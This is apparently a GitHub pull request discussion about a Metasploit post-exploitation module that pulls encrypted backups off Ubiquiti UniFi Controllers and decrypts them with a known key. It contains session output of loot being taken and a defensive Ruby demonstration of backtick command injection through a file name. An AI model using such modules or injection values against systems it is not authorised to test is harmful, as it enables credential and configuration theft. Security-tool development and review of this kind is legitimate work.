unifi backup downloader #11548
I believe the established approach is to cry. Something like this:
The obvious attack vectors are local. No obvious remote vector, as the path and arguments are fully controlled by Metasploit. A couple of things stand out, but may prove to be non-issues:
It isn't a password protected zip, it's an AES encrypted zip. If I didn't document that clearly, I definitely can adjust. To be clear, the database file needs the following: First things first, get files. Once this lands, I'll work on a db parser.
Default backup path on macOS is
Sorry wrong button, should not have closed :-(
Thanks @jmartin-r7. Added osx to the code, however w/o a box to test with, someone will need to test that portion.
Travis error isn't related to this PR code:
delayed until I can test on a mac
OSX testing completed, this is ready for review.
ping anyone with UniFi, this has been ready for review for a month and it's framework friday :)
Just tested against 5.10.23 (latest) and still working. I did notice though that when on a
This works and I can land as is if desire is to defer on enhancements I have noted.
||
# https://help.ubnt.com/hc/en-us/articles/205202580-UniFi-system-properties-File-Explanation | ||
sprop_locations.each do |sprop| | ||
next unless exists?(sprop) |
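Review bot: the `next unless exists?(sprop)` guard skips a location without printing anything, so when none of `sprop_locations` is present the operator cannot tell which paths were checked or why the run produced no loot. Consider a `vprint_status` naming the skipped path in that branch, plus one status line after the loop when no location yielded data.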
From testing.
Might be worth adding some detail here when no locations result in data.
On a Windows system with no backup stored the module reported accessing `system.properties` and did then complete. When no backup exists may be worth a status.
I also noted on Linux when the session user does not have read access to `system.properties` path there is no detail reported.
Same Linux target:
session as regular user
```
msf5 payload(linux/x64/meterpreter/reverse_tcp) > use post/multi/gather/ubiquiti_unifi_backup
msf5 post(multi/gather/ubiquiti_unifi_backup) > set session 1
session => 1
msf5 post(multi/gather/ubiquiti_unifi_backup) > run
[*] Post module execution completed
msf5 post(multi/gather/ubiquiti_unifi_backup) > exit
```
session as root
```
msf5 payload(linux/x64/meterpreter/reverse_tcp) > use post/multi/gather/ubiquiti_unifi_backup
msf5 post(multi/gather/ubiquiti_unifi_backup) > set session 1
session => 1
msf5 post(multi/gather/ubiquiti_unifi_backup) > run
[+] Read UniFi Controller file /var/lib/unifi/system.properties
[+] File /var/lib/unifi/backup/5.10.23.unf saved to /home/msfuser/.msf4/loot/20190514173003_default_192.168.17.102_ubiquiti.unifi.b_530890.unf
[+] File 5.10.23.unf DECRYPTED and saved to /home/msfuser/.msf4/loot/20190514173003_default_192.168.17.102_ubiquiti.unifi.b_721128.zip. File needs to be repair via `zip -FF`
[*] Attempting to repair zip file (this is normal)
[+] File /var/lib/unifi/backup/5.10.23.unf DECRYPTED and REPAIRED and saved to /home/msfuser/.msf4/loot/20190514173004_default_192.168.17.102_ubiquiti.unifi.b_058997.zip.
[+] File /var/lib/unifi/backup/autobackup/autobackup_5.10.23_20190514_1725_1557854700012.unf saved to /home/msfuser/.msf4/loot/20190514173005_default_192.168.17.102_ubiquiti.unifi.b_558645.unf
[+] File autobackup_5.10.23_20190514_1725_1557854700012.unf DECRYPTED and saved to /home/msfuser/.msf4/loot/20190514173005_default_192.168.17.102_ubiquiti.unifi.b_491301.zip. File needs to be repair via `zip -FF`
[*] Attempting to repair zip file (this is normal)
[+] File /var/lib/unifi/backup/autobackup/autobackup_5.10.23_20190514_1725_1557854700012.unf DECRYPTED and REPAIRED and saved to /home/msfuser/.msf4/loot/20190514173005_default_192.168.17.102_ubiquiti.unifi.b_438546.zip.
[*] Post module execution completed
```
I'd agree with you, looks like I went too 'linux' style and made everything verbose printing. I'll add a few prints for more detail.
Added two prints, one for when reading `system.properties` files, and one for when trying to read data. I could add another one for 'no data was found' as well if you'd think it to be beneficial
This works, thanks.
Release Notes
Thanks @jmartin-r7
Post module to run against Ubiquiti Unifi Controllers to download any backup or autobackup files.
These files are.... annoying. They have a .unf extension but are AES encrypted zip files. Luckily, it's a known key so we decrypt it. The files then need to be repaired, `zip` has `-FF` to do this (and it works), however the `rubyzip` gems don't have this. So if `zip` is available on the system (aka nix and maybe osx), we repair the file as well. If a repair doesn't happen, 7zip may work, but haven't tried.
See docs for install instructions, and verification steps.
@bcoles there is a `system` call in here, the module provides all input, can you think of an RCE possible on this? I thought maybe if your target was something with ticks in it maybe, but also couldn't think of a better way to do the call. Open to help and suggestions!
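The `system` question above, as an added example that is not code from this PR: it builds the repair command three ways for a constructed file name containing backticks, runs each in a scratch directory, and reports whether the shell executed the backticks. `echo` stands in for `zip` so the demo needs no Info-ZIP install, and the helper names (`as_string`, `as_escaped`, `as_argv`, `injected?`) and the `--out` argument layout are assumptions of this example.

```ruby
require 'open3'
require 'shellwords'
require 'tmpdir'

# Constructed file name containing backticks, the case raised in the PR.
HOSTILE = 'autobackup`touch marker`.zip'.freeze

# One interpolated string: /bin/sh parses the paths before the tool runs.
def as_string(tool, src, dst)
  "#{tool} -FF #{src} --out #{dst}"
end

# Still a string, but each path is escaped into a single shell word.
def as_escaped(tool, src, dst)
  "#{tool} -FF #{Shellwords.escape(src)} --out #{Shellwords.escape(dst)}"
end

# Argument vector: no shell is involved, each path is exactly one argument.
def as_argv(tool, src, dst)
  [tool, '-FF', src, '--out', dst]
end

# Builds the command in the given style, runs it in a scratch directory and
# returns true if the backticks were executed (the file "marker" appeared).
# tool defaults to echo, a stand-in for zip (assumption of this example).
def injected?(style, tool = 'echo')
  Dir.mktmpdir do |dir|
    src = File.join(dir, HOSTILE)
    dst = File.join(dir, 'fixed.zip')
    cmd = send(style, tool, src, dst)
    # A String goes through the shell; an Array is executed directly.
    Open3.capture2e(*Array(cmd), chdir: dir)
    File.exist?(File.join(dir, 'marker'))
  end
end

if __FILE__ == $PROGRAM_NAME
  %i[as_string as_escaped as_argv].each do |style|
    puts format('%-10s backticks executed: %s', style, injected?(style))
  end
end
```

The multi-argument form of Ruby's `system` behaves like `as_argv` here: with more than one argument the command is executed without a shell.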